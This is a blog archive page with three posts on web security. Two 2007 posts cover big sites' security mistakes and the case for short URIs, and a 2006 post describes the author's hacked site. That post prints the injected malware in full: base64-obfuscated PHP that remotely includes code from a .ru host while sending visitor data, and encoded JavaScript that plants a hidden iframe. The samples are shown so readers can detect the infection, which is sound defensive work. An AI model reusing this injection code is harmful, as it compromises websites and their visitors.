Archive for the 'cracking' Category

Following the big dogs on web application security

Friday, December 21st, 2007

(This post originally appeared as part of the 2007 PHP Advent calendar)

At this time of year people are apt to get all warm and sentimental … Right up until their first trip to a mall on a Saturday when they go back to hating their fellow man and instituting an “If Amazon don’t sell it, you’re not getting it” policy on gift giving. December is very important to retail, and very important to retail sites.

I remember some good advice I read a long time ago. Vincent Flanders & Michael Willis in Web Pages That Suck suggested you “follow the big dogs”, in other words copy Amazon. Their reasoning was sound. You will likely get it wrong on your first try, you can’t afford to run usability studies of your own, and don’t want to spend months and numerous iterations getting it right. Learning from other people’s mistakes is always less embarrassing than learning from your own.

I have had to paraphrase here, because I opted to recycle nearly all my old books rather than ship them half way around the world. Had I wanted to check the accuracy of my quote, it would have cost me one cent to buy a second hand copy of that book.

While the long term relevance of most of the advice in old computer books is fairly accurately reflected by that valuation, it was good advice in 1998. If you were embarking on an ecommerce venture at a time when there was a shortage of people who knew what they were doing, best practice conventions were not settled and innovation was rapid there were worse philosophies you could have than “What Would Amazon Do?”

The same idea is popular today, and for the same reason. There is always a shortage of people who really know what they are doing, so there are plenty of people making decisions by asking “What Would Google/Amazon/Microsoft/eBay/PayPal/Flickr/Yahoo/YouTube/Digg/Facebook Do?” If you are in a space where nobody really knows the best way yet, copying the segment leader is a low risk, low talent shortcut to making mainly good decisions, even if does mean you are always three months behind.

The idea does not apply well to web application security. There are two main reasons for this: first, the big dogs make plenty of mistakes, and second, good security is invisible.

You might notice mistakes, you might read about exploited vulnerabilities and you might notice PR based attempts at the illusion of security, but you probably don’t notice things quietly being done well.

Common big dog mistakes include:

  • Inviting people to click links in email messages.
    You would think that, as one of the most popular phishing targets out there, PayPal would not want to encourage people to click links in emails. Yet, if you sign up for a Paypal account, the confirmation screen requests that you do exactly that.

    Paypal Confirmation Screen

  • Stupid validation rules.
    We all want ways to reject bad data, but it is usually not easy to define hard and fast rules to recognize it, even for data with specific formatting. Everybody wants a simple regex to check email addresses are well formed. Unfortunately, to permit any email that would be valid according to RFC2822, a simple one is not going to cut it. Which means that many, many people add validation that is broken and reject some real addresses. Most are not as stupid as the one AOL used to have for signing up for AIM, which insisted that all email addresses ended in .com, .net, .org, .edu or .mil, but many will reject + and other valid non-alphanumeric characters in the local part of an address (the bit before the @).
  • Stupid censorship systems
    Simple keyword based censorship always annoys people. Eventually, somebody named Woodcock is going to turn up.
    Xbox Live is infamous for rejecting gamertags and mottos after validating them against an extensive list of “inappropriate” words. Going far beyond comedian George Carlin’s notorious Seven Dirty Words, there is a list of about 2700 words that are supposedly banned. By the time you add your regular seven, all possible misspellings thereof, most known euphemisms for body parts, racial epithets, drug related terms, Microsoft brand names, Microsoft competitors’ brand names, terms that sound official and start heading off into foreign languages, you end up catching a lot of innocent phrases.
  • Broken HTML filtering.
    Stripping all HTML from user submitted content and safely displaying the result is often done badly, but is not that difficult. On the other hand, allowing some HTML formatting as user input, but disallowing “dangerous” parts is not an easy problem, especially if you are trying to foster an ecosystem of third party developers.

    The MySpace Samy worm worked not because MySpace failed to filter input, but because of a series of minor cracks that combined allowed arbitrary JavaScript. Once you choose to allow CSS so that users can add what passes for style on MySpace it becomes very hard to limit people to only visual effects.

    eBay has had less well known problems with a similar cause, but without a dramatic replicating worm implementation. Earlier this year scammers were placing large transparent divs over their listings so that any click on the page triggered a mailto or loaded a page of their own. I could not see examples today, so I assume they have fixed the specific vector, but giving users a great deal of freedom to format content that they upload makes ensuring that content is safe for others to view very difficult.

  • Stupidly long urls
    The big dogs love long complicated urls.

          https://chat.bankofamerica.com/hc/LPBofA2/?visitor=&mse
          ssionkey=&cmd=file&file=chatFrame&site=LPBofA2&channel=
          web&d=1185830684250&referrer=%28engage%29%20https%3A//s
          itekey.bankofamerica.com/sas/signon.do%3F%26detect%3D3&
          sessionkey=H6678674785673531985-3590509392420069059K351
          97612

    Having let people get used to that sort of garbage from sites that they should be able to trust, you can’t really be surprised that normal people can’t tell the difference between an XSS attack hidden in URL encoded JavaScript and a real, valid, safe URI. Even abnormal people who can decode a few common URL encodings in their heads are not really scrolling across the hidden nine tenths of the address bar to look at that lot.

  • Looking for simple solutions
    Security is not one simple problem, or even a set of simple problems, so looking for simple solutions such as the proposed .bank TLD is rarely helpful. This is not helped by the vendor-customer nature of much of the computer industry. The idea that you can write a check to somebody and a problem goes away is very compelling - buy a more expensive domain name, or a more expensive Extended Validation Certificate, or run an automated software scan to meet PCI compliance and you might sleep more soundly at night, but many users already don’t understand the URL and other clues that their browser provides them. Giving more subtle clues to them is unlikely to help. Displaying a GIF in the corner of your web page bragging about your safety might create the illusion of security and might well help sales, but it won’t actually help safety on its own.

You can’t follow the public example of the big dogs. They still make some dumb decisions, they still make the small mistakes that allow the CSRF and XSS exploits that are endemic and they are often not very responsive to disclosures. If a major site makes 99 good security decisions and one bad one, you won’t notice the 99. Unfortunately with security you are still far better off seeing how others have been exploited and critically evaluating what they say they should be doing, rather than trying to watch what they actually are doing.

Oh, and remember to stay away from malls on weekends in December.

Short, Clean URIs Are More Secure

Tuesday, July 31st, 2007

There are lots of reasons to use clean, short, readable URIs. Search engines like them. People have some hope of dictating or typing them correctly. Email clients are less likely to mung or truncate them. They give people navigational cues and an extra way to navigate a website. You can even fit them on one billboard (unlike say this one).

One generally ignored advantage is security.

Many phishing, XSS, CSRF and all URI exploits rely at least in part in part on putting stuff the user does not understand in the URI.

Here are a few real URIs from popular websites all found inside a minute within 3 clicks of the home page:

Having let people get used to that sort of garbage from sites that they should be able to trust, you can’t really be surprised that normal people can’t tell the difference between an XSS attack hidden in URL encoded JavaScript and a real, valid, safe URI. Even abnormal people who can decode a few common URL encodings in their heads are not really scrolling across the hidden nine tenths of the address bar to look at that lot.

It won’t help everybody. There are always going to be people who are happy to believe that their bank sends them email from a free address like bank.of.amerika@hotmail.com, and sufficiently sophisticated social engineering is always going to work on some people, some of the time, but the sites that are particularly popular with phishing attacks are making it unnecessarily easy.

If commonly used sites had short, sensible URIs it would not take genius on the part of slightly cynical users to notice that every real bank URI they had seen in the past looked something like https://www.bankofamerica.com/myaccount/login so the 300 character monstrosity full of percent symbols and ampersands that they were being presented with is a little on the fishy side.

Now, go and tidy your room.

Spyware and popups close to home

Monday, February 27th, 2006

It seems somebody, somewhere has a fine sense of irony. A few days ago I posted about a sleezy popup advertising vendor. Then on Sunday morning I looked at my blog to find that it has been altered and code has been inserted in numerous places to force downloads of a (presumably corrupt) WMF file from a website with a .ru extension.

My web host was really, really, remarkably useless, so I am a bit short on details. I think the most likely situation is that an automated script running somewhere on the shared web host was spidering from account to account and inserting its payload into files with .php or .html extensions wherever it found one writable by the webserver user.

There are a few obvious morals to this story.

  • There are scripts in the wild that target PHP sites on shared hosts. Be careful with yours.
  • Have as few files as possible writable by the webserver user on a shared host. I am sure you already knew this, but it can be hard because,
  • Writers of web apps, such as forums and blogs require you to have some files and directories writable, so if you are choosing such software for a shared host see if you can find ones that require as few writable files as possible, and
  • No matter how low your expectations are for the quality of support you expect from a crappy <$10 per month web host, it is always possible for those expectations to be exceeded.

If you have rarely checked stuff sitting on a shared host, it would be worth grepping for some distinctive code from that (perhaps “error_reporting(0)”) to make sure you are not in the same boat.

The whole situation of course serves to make Aussie Hero Dale Begg-Smith all the more lovable in my eyes. For anybody who does not understand why people hate these sort of business practices and the arseclowns that practice them, it is because they make their money at the expense of wasting other people’s time. I spent half of my Sunday cleaning up this mess, and still have a few more domains to fix now (Monday night).

In case anybody is curious, the code generally looked like this:

error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".
base64_encode($g).".".base64_encode($h).".".base64_encode($n);
if((include_once(base64_decode("aHR0cDovLw==").
base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str)))
{}
else {
include_once(base64_decode("aHR0cDovLw==").
base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}

or


<script language="javascript" type="text/javascript">
var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@ %kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@ 4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';
while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}

which un-obsfucated is:
<div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe
src="http://user19.iframe.ru/?s=1" frameborder=0 vspace=0 hspace=0 width=1 height=1
marginwidth=0 marginheight=0 scrolling=no></iframe></div>

In one file I also found:

<a href = "http://mrsnebraskaamerica.com/catalog/images/sierra/hackmai-2.0.shtml" class=giepoaytr title="hackmai 2.0">hackmai 2.0</a>

There were also assorted files with generic sounding names created, like date.php and report.php and .htaccess files created or appended to to direct 404s to the new bogus files.